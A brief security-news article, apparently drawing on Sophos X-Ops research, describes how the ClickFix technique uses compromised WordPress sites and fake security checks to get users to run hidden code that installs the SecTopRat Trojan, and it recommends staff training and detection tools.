Thought Leadership
Despite its age, the ClickFix method remains a popular tool in the arsenal of cybercriminals. Security researchers from Sophos X-Ops came across the sophisticated attack tactic again in their latest analysis.
Particularly affected in March: companies with intensive use of calendar and CRM systems. These included car dealerships, clinics and doctors’ surgeries – they accounted for around a quarter of those affected.
How the attack works
The scam seems harmless – and that’s exactly what makes it so dangerous. Attackers inject manipulated JavaScript codes via compromised WordPress pages or malicious website plugins. These trick users into executing a certain key combination – supposedly as part of a security check. In reality, the Windows “Run” command field opens, a hidden code is inserted and activated. The result: the SecTopRat Trojan is installed and spies on login data, bank details and company access.
A perennial favorite in the hacker’s toolbox
Whether state-controlled or operated by individual perpetrators, ClickFix is and remains a favorite among cyberattacks. Why? Because the trick works. Stolen credentials can be used to compromise networks quickly and effectively. The market for this is booming – and ClickFix delivers reliably.
Prevention is the best protection
Even if the technology is not new: Its potential remains high. Sophos X-Ops warns that ClickFix will be with us for a long time to come. This makes it all the more important to train and sensitize employees. If you know the scam, you won’t click blindly. Technical vigilance is also required: security solutions such as NDR (Network Detection and Response) or MDR (Managed Detection and Response) help to detect and stop suspicious processes such as atypical PowerShell commands or unusual use of the “Execute” function in good time.
Conclusion:
ClickFix is a prime example of how old tricks with a bit of disguise can become modern threats. Vigilance, education and modern security solutions are the best weapons in the fight against this digital deception.
(vp/Sophos)
